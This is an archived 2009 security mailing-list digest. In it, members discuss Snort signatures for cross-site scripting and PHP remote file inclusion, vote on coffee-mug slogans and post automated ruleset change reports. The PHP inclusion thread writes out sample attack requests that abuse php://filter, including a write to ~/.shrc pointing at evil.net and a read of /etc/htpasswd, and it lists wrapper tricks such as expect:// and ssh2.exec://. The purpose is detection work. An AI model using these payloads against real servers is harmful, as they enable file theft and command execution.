From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 06 Aug 2009 14:49:14 -0400
Subject: [Emerging-Sigs] various sigs
In-Reply-To:
References:
Message-ID: <4A7B25AA.7080603@jonkmans.com>

I posted the first and third. The rest would have to be pretty specific
to a local net. Making sure they don't have those things actually
happening intentionally...

Thanks Kevin!

Matt

Kevin Ross wrote:
> Thoughts? I have disabled the ones which in some environments may cause
> high load/false positives but they work.
> > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB > in URI, Possible Cross Site Scripting Attempt"; > flow:to_server,established; uricontent:""; nocase; > classtype:web-application-attack; reference:url,ha.ckers.org/xss.html > ; sid:16000001; rev:1;) > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB SRC= > in URI, Possible Cross Site Scripting Attempt"; > flow:to_server,established; uricontent:"SRC="; nocase; > classtype:web-application-attack; reference:url,ha.ckers.org/xss.html > ; sid:16000002; rev:1;) > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB > Onmouseover= in URI - Likely Cross Site Scripting Attempt"; > flow:to_server,established; uricontent:"onmouseover="; nocase; > classtype:web-application-attack; > reference:url,www.w3schools.com/jsref/jsref_onmouseover.asp > ; sid:16000003; > rev:1;) > > #alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB > Possible Remote File Inclusion Attempt Using path_escape"; > flow:to_server,established; uricontent:".php?path_escape=http"; nocase; > classtype:web-application-attack; sid:16000004; rev:1;) > > #alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB Two > .php Extensions Together in URI, Possible Remote File Inclusion > Attempt"; flow:to_server,established; uricontent:".php.php"; nocase; > classtype:web-application-attack; > reference:url,en.wikipedia.org/wiki/Remote_File_Inclusion > ; sid:16000005; rev:1;) > > #alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB > Possible Remote File Inclusion Attempt Using php?page="; > flow:to_server,established; uricontent:".php?page=http"; nocase; > classtype:web-application-attack; > reference:url,en.wikipedia.org/wiki/Remote_File_Inclusion > ; > reference:url,projects.webappsec.org/Remote-File-Inclusion > ; sid:16000006; rev:1;) > > #alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB > Possible Remote File Inclusion Attempt Using php?file="; > 
flow:to_server,established; uricontent:".php?file=http"; nocase; > classtype:web-application-attack; > reference:url,en.wikipedia.org/wiki/Remote_File_Inclusion > ; > reference:url,projects.webappsec.org/Remote-File-Inclusion > ; sid:16000007; rev:1;) > > Kevin > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From inittab at jtan.com Thu Aug 6 14:53:22 2009 From: inittab at jtan.com (RPG) Date: Thu, 06 Aug 2009 14:53:22 -0400 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: <4A7B21ED.5030606@jonkmans.com> References: , , <4A7B1BCA.1030906@jonkmans.com> <4A7B21ED.5030606@jonkmans.com> Message-ID: <4A7B26A2.7040700@jtan.com> [Logo] defending networks against all enemies foreign and domestic Matt Jonkman wrote: > Amen! :) > > Matt > > Bill Scherr IV wrote: > >> Here's One >> >> There are only three things you can trust: >> Coffee >> Packets >> [Logo] >> >> >> (Or did someone already post that?) >> B. >> >> Circa 14:07, 6 Aug 2009, a note, claiming source Matt Jonkman , was sent to me: >> >> Date sent: Thu, 06 Aug 2009 14:07:06 -0400 >> From: Matt Jonkman >> To: "Haag, Dale A" >> Copies to: emerging-sigs at emergingthreats.net >> Subject: Re: [Emerging-Sigs] Coffee Cup Slogans >> >> >>> There are so many good ideas I'm getting the better ones together and >>> we'll do a vote. I know the poll thing is hokey, but I think it's the >>> best way to get a good decision made here. 
>>>> _______________________________________________ >>>> Emerging-sigs mailing list >>>> Emerging-sigs at emergingthreats.net >>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >>>> >>> -- >>> -------------------------------------------- >>> Matthew Jonkman >>> Emerging Threats >>> Open Information Security Foundation (OISF) >>> Phone 765-429-0398 >>> Fax 312-264-0205 >>> http://www.emergingthreats.net >>> http://www.openinformationsecurityfoundation.org >>> -------------------------------------------- >>> >>> PGP: http://www.jonkmans.com/mattjonkman.asc >>> >>> >>> _______________________________________________ >>> Emerging-sigs mailing list >>> Emerging-sigs at emergingthreats.net >>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >>> >> Bill Scherr IV, GSEC, GCIA >> Principal Security Engineer >> EWA Information and Infrastructure Technologies >> bscherr at iit-tek.com >> bscherr at ewa.com >> 703-478-7608 >> >> > > From jonkman at jonkmans.com Thu Aug 6 15:03:31 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 06 Aug 2009 15:03:31 -0400 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: <4A7B26A2.7040700@jtan.com> References: , , <4A7B1BCA.1030906@jonkmans.com> <4A7B21ED.5030606@jonkmans.com> <4A7B26A2.7040700@jtan.com> Message-ID: <4A7B2903.5060503@jonkmans.com> Nice! I have the urge to stand at attention and salute for some reason... RPG wrote: > [Logo] > defending networks > against all enemies > foreign and domestic > > > > Matt Jonkman wrote: >> Amen! :) >> >> Matt >> >> Bill Scherr IV wrote: >> >>> Here's One >>> >>> There are only three things you can trust: >>> Coffee >>> Packets >>> [Logo] >>> >>> >>> (Or did someone already post that?) >>> B. 
>>> >>> Circa 14:07, 6 Aug 2009, a note, claiming source Matt Jonkman >>> , was sent to me: >>> >>> Date sent: Thu, 06 Aug 2009 14:07:06 -0400 >>> From: Matt Jonkman >>> To: "Haag, Dale A" >>> Copies to: emerging-sigs at emergingthreats.net >>> Subject: Re: [Emerging-Sigs] Coffee Cup Slogans >>> >>> >>>> There are so many good ideas I'm getting the better ones together and >>>> we'll do a vote. I know the poll thing is hokey, but I think it's the >>>> best way to get a good decision made here. >>>> >>>> Keep sending the ideas for a couple more days then I'll put the poll up >>>> and let everyone know. >>>> >>>> Thanks for the ideas! These are all great. Especially the sourcefire >>>> ones. :) >>>> >>>> Matt >>>> >>>> Haag, Dale A wrote: >>>> >>>>> Here are my entries: >>>>> >>>>> 1. Coffee and Packets; Best if filtered >>>>> >>>>> 2. Professional >>>>> Coffee >>>>> Research >>>>> Engineer >>>>> ( bold font on PCRE ) >>>>> >>>>> 3. 1 spoon sugar, 2 spoons >>>>> [ INSERT ET LOGO HERE ] >>>>> >>>>> 4. Start Your Day Right >>>>> [ INSERT ET LOGO HERE ] >>>>> >>>>> >>>>> ----------------------------------------- >>>>> The information contained in this e-mail and any attached documents >>>>> may contain information that is confidential or otherwise protected >>>>> from disclosure. If you are not the intended recipient of this >>>>> message, or if this message has been sent to you in error, please >>>>> immediately alert the sender by reply e-mail and then delete this >>>>> message, including any attachments. Any dissemination, distribution >>>>> or other use of the contents of this message by anyone other than >>>>> the intended recipient is strictly prohibited. 
>>>>> _______________________________________________ >>>>> Emerging-sigs mailing list >>>>> Emerging-sigs at emergingthreats.net >>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >>>>> >>>> -- >>>> -------------------------------------------- >>>> Matthew Jonkman >>>> Emerging Threats >>>> Open Information Security Foundation (OISF) >>>> Phone 765-429-0398 >>>> Fax 312-264-0205 >>>> http://www.emergingthreats.net >>>> http://www.openinformationsecurityfoundation.org >>>> -------------------------------------------- >>>> >>>> PGP: http://www.jonkmans.com/mattjonkman.asc >>>> >>>> >>>> _______________________________________________ >>>> Emerging-sigs mailing list >>>> Emerging-sigs at emergingthreats.net >>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >>>> >>> Bill Scherr IV, GSEC, GCIA >>> Principal Security Engineer >>> EWA Information and Infrastructure Technologies >>> bscherr at iit-tek.com >>> bscherr at ewa.com >>> 703-478-7608 >>> >>> >> >> > -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From evilghost at packetmail.net Thu Aug 6 15:12:51 2009 From: evilghost at packetmail.net (evilghost@packetmail.net) Date: Thu, 6 Aug 2009 14:12:51 -0500 Subject: [Emerging-Sigs] Snort Validator In-Reply-To: <4A7B04C6.5010601@jonkmans.com> References: <4A7B04C6.5010601@jonkmans.com> Message-ID: <4A7B2B33.4040902@packetmail.net> [ET LOGO] We make our own coffee Matt Jonkman wrote: > Decoder's Snort Validator is being used here to keep your rules clean > and fresh. It's a great script, we've had it in palce since about the > last time we had a ruleset error get published. 
(few months now) :) > > We've got a wiki page up for it and decoder has generously decided to > publish. This script will be very useful for everyone that has any local > rulesets. Highly recommend using it. > > You can find information and downloads here: > http://doc.emergingthreats.net/bin/view/Main/SnortValidator > > Thanks again decoder! > > Matt > > From daniel.clemens at packetninjas.net Thu Aug 6 15:48:07 2009 From: daniel.clemens at packetninjas.net (Daniel Clemens) Date: Thu, 6 Aug 2009 14:48:07 -0500 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: <4A7B2903.5060503@jonkmans.com> References: , , <4A7B1BCA.1030906@jonkmans.com> <4A7B21ED.5030606@jonkmans.com> <4A7B26A2.7040700@jtan.com> <4A7B2903.5060503@jonkmans.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Aug 6, 2009, at 2:03 PM, Matt Jonkman wrote: > Nice! I have the urge to stand at attention and salute for some > reason... BTW, Packetninjas LLC will contribute one pound of freshly roasted coffee to the winner of this months winner. We roast our own beans over here and for the next month it looks like we will be enjoying the great and ever fresh 'Kona' coffee beans. Of course this is if people would want this thrown in... :P | Daniel Uriah Clemens | Packetninjas L.L.C | | http://www.packetninjas.net | c. 205.567.6850 | | o. 
866.267.8851 - - Esse quam videra (to be , rather than to appear) -----BEGIN PGP SIGNATURE----- iD8DBQFKezN3lZy1vkUrR4MRAkX+AJ0UG9eA2xjVhhpKuuA7YYlcBjRHJQCfT6Q0 /2utU+8LJjCjWjdYrjeTwig= =bNB/ -----END PGP SIGNATURE----- From emerging at emergingthreats.net Thu Aug 6 16:00:11 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Thu, 6 Aug 2009 16:00:11 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090806200011.EDA054504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Thu Aug 6 16:00:11 2009 [***] [+++] Added rules: [+++] 2009711 - ET TROJAN Win32.Runner (Often Rootkit) - POST (emerging-virus.rules) 2009712 - ET MALWARE Adware PlusDream - GET Config Download/Update (emerging-malware.rules) 2009713 - ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected (emerging.rules) [///] Modified active rules: [///] 2002997 - ET WEB PHP Remote File Inclusion (monster list http) (emerging-web.rules) 2009670 - ET WEB Nagios statuswml.cgi Remote Arbitrary Shell Command Injection attempt (emerging-web.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-malware.rules (1): # ref: a9036ae5d9bb8e3c53d5e0126d448d1d -> Added to emerging-sid-msg.map (3): 2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.threatexpert.com/threats/trojan-win32-runner.html || url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html 2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update 2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2 -> Added to emerging-sid-msg.map.txt (3): 2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.threatexpert.com/threats/trojan-win32-runner.html || 
url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html
2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update
2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2

-> Added to emerging-virus.rules (1):
# ref: 14d98e50d25dfc3c1bc011c2856ac1a8

[---] Removed non-rule lines: [---]

-> Removed from emerging-sid-msg.map (20):
-> Removed from emerging-sid-msg.map.txt (20):

From Dale_A_Haag at homedepot.com Thu Aug 6 16:15:16 2009
From: Dale_A_Haag at homedepot.com (Haag, Dale A)
Date: Thu, 6 Aug 2009 16:15:16 -0400
Subject: [Emerging-Sigs] Coffee Cup Slogans
In-Reply-To:
References:
Message-ID:

ET Phone Home
[ ET LOGO ]

Coffee Tea or ET
[ ET LOGO ]

SNORT'em If You Got 'Em!
[ ET LOGO ]

From diomar at rmws.net Thu Aug 6 16:26:05 2009
From: diomar at rmws.net (J Carvalho)
Date: Thu, 6 Aug 2009 16:26:05 -0400
Subject: [Emerging-Sigs] Coffee Cup Slogans
In-Reply-To:
References:
Message-ID:

Evangelized Technology
[appropriate logo]

Engineered Taxonomy
[appropriate logo]

It's been a long day and I haven't had enough |C0 FF EE| (still my favorite).
--joe

From frank at knobbe.us Thu Aug 6 16:39:06 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Thu, 6 Aug 2009 15:39:06 -0500
Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt
In-Reply-To: <17b0fcab0908052257u632540a8y3113267270b4c269@mail.gmail.com>
References: <4A79F218.4010307@mare-system.de> <1249510693.4378.47.camel@localhost> <17b0fcab0908052257u632540a8y3113267270b4c269@mail.gmail.com>
Message-ID: <20090806203906.GC87196@knobbe.us>

On Thu, Aug 06, 2009 at 06:57:58AM +0100, Jamie Riden wrote:
> > 'Cause the pcre only matches for any =http, =https, =ftp, or =ftps in
> > the URL. I can't see =php:// being a valid URI.
>
> I love the smell of optimism in the mornings :)
>
> See http://us.php.net/manual/en/wrappers.php, particularly
> http://us.php.net/manual/en/wrappers.php.php
>
> "php://input" can be the raw POST data for example.
>
> also, an example given for php://filter:
>
> readfile("php://filter/resource=http://www.example.com");

Well, that's just wrong :)

So what would be a good example that uses "=php://" in the request?

"/something.php?php://filter/write/resource=~/.shrc=http://evil.net"
"/something.php?php://filter/read/read=/etc/htpasswd"

I guess any *remote* inclusions are still caught thanks to the "=http" match.

Since it sounds like you have some experience with php://, are there ways to read/write files on the file system that way?

Cheers,
Frank

From jim.mcquaid at gmail.com Thu Aug 6 17:29:26 2009
From: jim.mcquaid at gmail.com (James McQuaid)
Date: Thu, 6 Aug 2009 17:29:26 -0400
Subject: [Emerging-Sigs] coffee cup slogans
Message-ID:

Thus far, I've enjoyed these the most:

Serious mug (in upper case with all three lines no taller than height of logo):
[Logo]
DEFENDING NETWORKS
AGAINST ALL ENEMIES
FOREIGN AND DOMESTIC

Humorous mug:
[Logo]
content: "|C0 FF EE|

--
James McQuaid
http://www.jamesmcquaid.com

From inittab at jtan.com Fri Aug 7 10:45:58 2009
From: inittab at jtan.com (RPG)
Date: Fri, 07 Aug 2009 10:45:58 -0400
Subject: [Emerging-Sigs] coffee cup slogans
In-Reply-To:
References:
Message-ID: <4A7C3E26.4080603@jtan.com>

I agree :) Send me six of each please :)

James McQuaid wrote:
> Thus far, I've enjoyed these the most:
>
> Serious mug (in upper case with all three lines no taller than height of logo):
> [Logo]
> DEFENDING NETWORKS
> AGAINST ALL ENEMIES
> FOREIGN AND DOMESTIC
>
> Humorous mug:
> [Logo]
> content: "|C0 FF EE|

From jamie.riden at gmail.com Fri Aug 7 11:02:03 2009
From: jamie.riden at gmail.com (Jamie Riden)
Date: Fri, 7 Aug 2009 16:02:03 +0100
Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt
In-Reply-To: <20090806203906.GC87196@knobbe.us>
References: <4A79F218.4010307@mare-system.de> <1249510693.4378.47.camel@localhost> <17b0fcab0908052257u632540a8y3113267270b4c269@mail.gmail.com> <20090806203906.GC87196@knobbe.us>
Message-ID: <17b0fcab0908070802m4595faf5m454f63f956840e16@mail.gmail.com>

2009/8/6 Frank Knobbe :
> On Thu, Aug 06, 2009 at 06:57:58AM +0100, Jamie Riden wrote:
>> > 'Cause the pcre only matches for any =http, =https, =ftp, or =ftps in
>> > the URL. I can't see =php:// being a valid URI.
>>
>> I love the smell of optimism in the mornings :)
>>
>> See http://us.php.net/manual/en/wrappers.php, particularly
>> http://us.php.net/manual/en/wrappers.php.php
>>
>> "php://input" can be the raw POST data for example.
>>
>> also, an example given for php://filter:
>>
>> readfile("php://filter/resource=http://www.example.com");
>
> Well, that's just wrong :)

Agreed! But it gets better.

echo file_get_contents('data://text/plain;base64,SSBsb3ZlIFBIUAo=');

also compress:

$file = 'compress.zlib://http://www.example.com/myarchive.gz';
$fr = fopen($file, 'rb');

file:// as default:

include("\\smbserver\share\path\to\winfile.ext");

and if you've enabled ssh or expect:

ssh2.exec://user:pass@example.com:22/usr/local/bin/somecmd
expect://command

> So what would be a good example that uses "=php://" in the request?
>
> "/something.php?php://filter/write/resource=~/.shrc=http://evil.net"
> "/something.php?php://filter/read/read=/etc/htpasswd"
>
> I guess any *remote* inclusions are still caught thanks to the "=http"
> match.
>
> Since it sounds like you have some experience with php://, are there ways
> to read/write files on the file system that way?

I haven't played with any of these, but looks like a potentially large can of worms just going from the doco.

cheers,
Jamie

--
Jamie Riden / jamesr at europe.com / jamie at honeynet.org.uk
http://www.ukhoneynet.org/members/jamie/

From jonkman at jonkmans.com Fri Aug 7 11:30:18 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 07 Aug 2009 11:30:18 -0400
Subject: [Emerging-Sigs] coffee cup slogans VOTING OPEN
In-Reply-To: <4A7C3E26.4080603@jtan.com>
References: <4A7C3E26.4080603@jtan.com>
Message-ID: <4A7C488A.4050203@jonkmans.com>

I'm with you there, those two are great. If both get enough votes and the pricing is reasonable to print them we could even go with both versions.

Anyway, we've filled up the options for the poll size, so let's start voting. If any new ideas come up we can run them in a second poll with the top of this one later.

http://www.emergingthreats.net/

Poll will be on your right side of the page.

Matt

RPG wrote:
> I agree :) Send me six of each please :)

From kevross33 at googlemail.com Fri Aug 7 08:53:37 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Fri, 7 Aug 2009 13:53:37 +0100
Subject: [Emerging-Sigs] BASE Help -Weird Issue
Message-ID:

Ok with BASE on one of my sensors I was playing with the Cache and status page and pressed clear cache. Now as in screenshot.png alerts are appearing in the cache but no alerts are showing on the alerts page. I can connect with other tools to the database such as snortsam, Biik, Livesnort etc and see the alerts. However even remotely I cannot get access with base, I have dropped the database and base and reinstalled everything but it still occurs. Any ideas what I have done?
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screenshot.png
Type: image/png
Size: 227162 bytes
Desc: not available
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090807/46a77e06/Screenshot-0001.png
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screenshot-1.png
Type: image/png
Size: 228009 bytes
Desc: not available
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090807/46a77e06/Screenshot-1-0001.png

From emerging at emergingthreats.net Fri Aug 7 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Fri, 7 Aug 2009 16:00:12 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090807200012.954D14504A@goliath.jonkmans.com>

[***] Results from Oinkmaster started Fri Aug 7 16:00:12 2009 [***]

[*] Rules modifications: [*]
None.

[---] Removed non-rule lines: [---]

-> Removed from emerging-sid-msg.map (72):
-> Removed from emerging-sid-msg.map.txt (72):
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510202 || ET COMPROMISED Known 
Compromised or Hostile Host Traffic TCP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510215 || ET COMPROMISED Known Compromised or Hostile Host Traffic 
UDP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From emerging at emergingthreats.net Sat Aug 8 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 8 Aug 2009 16:00:12 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090808200012.646A84504A@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sat Aug 8 16:00:12 2009 [***]

[*] Rules modifications: [*]
None.

[---] Removed non-rule lines: [---]

-> Removed from emerging-sid-msg.map (48):
2500170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
